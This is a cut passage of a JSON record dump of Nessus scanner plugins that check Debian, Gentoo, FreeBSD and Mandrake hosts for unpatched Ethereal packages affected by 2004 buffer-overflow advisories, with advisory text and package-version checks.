"nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0176"], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ethereal", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-511.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15348", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-511. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15348);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/20 2:17:11\");\n\n script_cve_id(\"CVE-2004-0176\");\n script_bugtraq_id(9952);\n script_xref(name:\"DSA\", value:\"511\");\n\n script_name(english:\"Debian DSA-511-1 : ethereal - buffer overflows\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several buffer overflow vulnerabilities were discovered in ethereal, a\nnetwork traffic analyzer. These vulnerabilities are described in the\nethereal advisory 'enpa-sa-00013'. Of these, only some parts of\nCAN-2004-0176 affect the version of ethereal in Debian woody.\nCAN-2004-0367 and CAN-2004-0365 are not applicable to this version.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-511\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the current stable distribution (woody), these problems have been\nfixed in version 0.9.4-1woody7.\n\nWe recommend that you update your ethereal package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ethereal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"ethereal\", reference:\"0.9.4-1woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"ethereal-common\", reference:\"0.9.4-1woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"ethereal-dev\", reference:\"0.9.4-1woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"tethereal\", reference:\"0.9.4-1woody7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:36:24", "references": ["http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html", "https://security.gentoo.org/glsa/200403-07"], "pluginID": "14458", "description": "The remote host is affected by the vulnerability described in GLSA-200403-07 (Multiple remote overflows and vulnerabilities in Ethereal)\n\n There are multiple vulnerabilities in versions of Ethereal earlier than 0.10.3, including:\n\tThirteen buffer overflows in the following protocol dissectors: NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP.\n \tA zero-length Presentation protocol selector could make Ethereal crash.\n \tA vulnerability in the RADIUS packet dissector which may crash ethereal.\n \tA corrupt color filter file could cause a segmentation fault.\n Impact :\n\n These vulnerabilities may cause Ethereal to crash or may allow an attacker to run arbitrary code on the user's computer.\n Workaround :\n\n While a workaround is not currently known for this issue, all users are advised to upgrade to the latest version of the affected package.", "edition": 5, "reporter": "Tenable", "published": "2004-08-30T00:00:00", "title": "GLSA-200403-07 : Multiple remote overflows and vulnerabilities in Ethereal", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:ethereal"], "id": "GENTOO_GLSA-200403-07.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14458", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-07.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14458);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/08/10 18:07:05\");\n\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0365\", \"CVE-2004-0367\");\n script_xref(name:\"GLSA\", value:\"200403-07\");\n\n script_name(english:\"GLSA-200403-07 : Multiple remote overflows and vulnerabilities in Ethereal\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-07\n(Multiple remote overflows and vulnerabilities in Ethereal)\n\n There are multiple vulnerabilities in versions of Ethereal earlier than 0.10.3, including:\n\tThirteen buffer overflows in the following protocol dissectors: NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP.\n \tA zero-length Presentation protocol selector could make Ethereal crash.\n \tA vulnerability in the RADIUS packet dissector which may crash ethereal.\n \tA corrupt color filter file could cause a segmentation fault.\n \nImpact :\n\n These vulnerabilities may cause Ethereal to crash or may allow an attacker\n to run arbitrary code on the user's computer.\n \nWorkaround :\n\n While a workaround is not currently known for this issue, all users are\n advised to upgrade to the latest version of the affected package.\"\n );\n # http://www.ethereal.com/appnotes/enpa-sa-00013.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All users should upgrade to the current version of the affected package:\n # emerge sync\n # emerge -pv '>=net-analyzer/ethereal-0.10.3'\n # emerge '>=net-analyzer/ethereal-0.10.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ethereal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/ethereal\", unaffected:make_list(\"ge 0.10.3\"), vulnerable:make_list(\"le 0.10.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-analyzer/ethereal\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-11-13T16:54:46", "references": ["http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html", "http://www.nessus.org/u?f89b32e9", "http://www.nessus.org/u?68fd1664"], "pluginID": "38151", "description": "Stefan Esser of e-matters Security discovered a baker's dozen of buffer overflows in Ethereal's decoders, including :\n\n- NetFlow\n\n- IGAP\n\n- EIGRP\n\n- PGM\n\n- IRDA\n\n- BGP\n\n- ISUP\n\n- TCAP\n\n- UCP\n\nIn addition, a vulnerability in the RADIUS decoder was found by Jonathan Heusser.\n\nFinally, there is one uncredited vulnerability described by the Ethereal team as :\n\nA zero-length Presentation protocol selector could make Ethereal crash.", "edition": 6, "reporter": "Tenable", "published": "2009-04-23T00:00:00", "title": "FreeBSD : multiple vulnerabilities in ethereal (cdf18ed9-7f4a-11d8-9645-0020ed76ef5a)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:tethereal", "p-cpe:/a:freebsd:freebsd:ethereal"], "id": "FREEBSD_PKG_CDF18ED97F4A11D896450020ED76EF5A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=38151", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38151);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:39\");\n\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0365\", \"CVE-2004-0367\");\n script_bugtraq_id(9952);\n script_xref(name:\"CERT\", value:\"119876\");\n script_xref(name:\"CERT\", value:\"124454\");\n script_xref(name:\"CERT\", value:\"125156\");\n script_xref(name:\"CERT\", value:\"433596\");\n script_xref(name:\"CERT\", value:\"591820\");\n script_xref(name:\"CERT\", value:\"644886\");\n script_xref(name:\"CERT\", value:\"659140\");\n script_xref(name:\"CERT\", value:\"695486\");\n script_xref(name:\"CERT\", value:\"740188\");\n script_xref(name:\"CERT\", value:\"792286\");\n script_xref(name:\"CERT\", value:\"864884\");\n script_xref(name:\"CERT\", value:\"931588\");\n script_xref(name:\"Secunia\", value:\"11185\");\n\n script_name(english:\"FreeBSD : multiple vulnerabilities in ethereal (cdf18ed9-7f4a-11d8-9645-0020ed76ef5a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser of e-matters Security discovered a baker's dozen of\nbuffer overflows in Ethereal's decoders, including :\n\n- NetFlow\n\n- IGAP\n\n- EIGRP\n\n- PGM\n\n- IRDA\n\n- BGP\n\n- ISUP\n\n- TCAP\n\n- UCP\n\nIn addition, a vulnerability in the RADIUS decoder was found by\nJonathan Heusser.\n\nFinally, there is one uncredited vulnerability described by the\nEthereal team as :\n\nA zero-length Presentation protocol selector could make Ethereal\ncrash.\"\n );\n # http://www.ethereal.com/appnotes/enpa-sa-00013.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html\"\n );\n # http://security.e-matters.de/advisories/032004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f89b32e9\"\n );\n # https://vuxml.freebsd.org/freebsd/cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?68fd1664\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ethereal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tethereal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ethereal<0.10.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"tethereal<0.10.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:53:24", "references": ["http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html"], "pluginID": "14123", "description": "A number of serious issues have been discovered in versions of Ethereal prior to 0.10.2. Stefan Esser discovered thirteen buffer overflows in the NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP dissectors. Jonathan Heusser discovered that a carefully-crafted RADIUS packet could cause Ethereal to crash. It was also found that a zero-length Presentation protocol selector could make Ethereal crash.\nFinally, a corrupt color filter file could cause a segmentation fault.\nIt is possible, through the exploitation of some of these vulnerabilities, to cause Ethereal to crash or run arbitrary code by injecting a malicious, malformed packet onto the wire, by convincing someone to read a malformed packet trace file, or by creating a malformed color filter file.\n\nThe updated packages bring Ethereal to version 0.10.3 which is not vulnerable to these issues.", "edition": 5, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : ethereal (MDKSA-2004:024)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:ethereal"], "id": "MANDRAKE_MDKSA-2004-024.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14123", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:024. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14123);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/07/19 20:59:13\");\n\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0365\", \"CVE-2004-0367\");\n script_xref(name:\"MDKSA\", value:\"2004:024\");\n\n script_name(english:\"Mandrake Linux Security Advisory : ethereal (MDKSA-2004:024)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of serious issues have been discovered in versions of\nEthereal prior to 0.10.2. Stefan Esser discovered thirteen buffer\noverflows in the NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP\ndissectors. Jonathan Heusser discovered that a carefully-crafted\nRADIUS packet could cause Ethereal to crash. It was also found that a\nzero-length Presentation protocol selector could make Ethereal crash.\nFinally, a corrupt color filter file could cause a segmentation fault.\nIt is possible, through the exploitation of some of these\nvulnerabilities, to cause Ethereal to crash or run arbitrary code by\ninjecting a malicious, malformed packet onto the wire, by convincing\nsomeone to read a malformed packet trace file, or by creating a\nmalformed color filter file.\n\nThe updated packages bring Ethereal to version 0.10.3 which is not\nvulnerable to these issues.\"\n );\n # http://www.ethereal.com/appnotes/enpa-sa-00013.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ethereal package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ethereal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"ethereal-0.10.3-0.1.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"ethereal-0.10.3-0.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:26:36", "references": ["http://www.mozilla.org/security/announce/2006/mfsa2006-17.html", "http://www.mozilla.org/security/announce/2006/mfsa2006-13.html", "http://mozillanews.org/?article_date=2004-12-08+06-48-46", "http://www.FreeBSD.org/ports/portaudit/cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html", "http://www.mozilla.org/security/announce/2006/mfsa2006-16.html", "http://www.osvdb.org/4462", "https://bugzilla.mozilla.org/show_bug.cgi?id=103638", "http://www.osvdb.org/4464", "http://www.mozilla.org/security/announce/2006/mfsa2006-09.html", "http://secunia.com/advisories/11185", "http://www.mozilla.org/security/announce/2006/mfsa2006-14.html", "http://www.mozilla.org/security/announce/2006/mfsa2006-15.html", "http://secunia.com/multiple_browsers_window_injection_vulnerability_test/", "http://security.e-matters.de/advisories/032004.html", "http://www.mozilla.org/security/announce/2006/mfsa2006-10.html", "http://www.mozilla.org/security/announce/2006/mfsa2006-11.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=273699", "http://www.mozilla.org/security/announce/2006/mfsa2006-12.html", "http://www.osvdb.org/4463", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "pluginID": "12537", "edition": 1, "description": "The following package needs to be updated: ethereal", "reporter": "Tenable", "published": "2004-07-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "FreeBSD : multiple vulnerabilities in ethereal (40)", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2011-10-03T00:00:00", "id": "FREEBSD_ETHEREAL_0103.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12537", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_cdf18ed97f4a11d896450020ed76ef5a.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12537);\n script_version(\"$Revision: 1.13 $\");\n script_bugtraq_id(9952);\n script_cve_id(\"CVE-2004-0367\");\n script_cve_id(\"CVE-2004-0365\");\n script_cve_id(\"CVE-2004-0176\");\n\n script_name(english:\"FreeBSD : multiple vulnerabilities in ethereal (40)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: ethereal');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://mozillanews.org/?article_date=2004-12-08+06-48-46\nhttp://secunia.com/advisories/11185\nhttp://secunia.com/multiple_browsers_window_injection_vulnerability_test/\nhttp://security.e-matters.de/advisories/032004.html\nhttp://www.ethereal.com/appnotes/enpa-sa-00013.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-09.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-10.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-11.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-12.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-13.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-14.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-15.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-16.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-17.html\nhttp://www.osvdb.org/4462\nhttp://www.osvdb.org/4463\nhttp://www.osvdb.org/4464\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=103638\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=273699');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_cvs_date(\"$Date: 2011/10/03 00:48:25 $\");\n script_end_attributes();\n script_summary(english:\"Check for ethereal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n 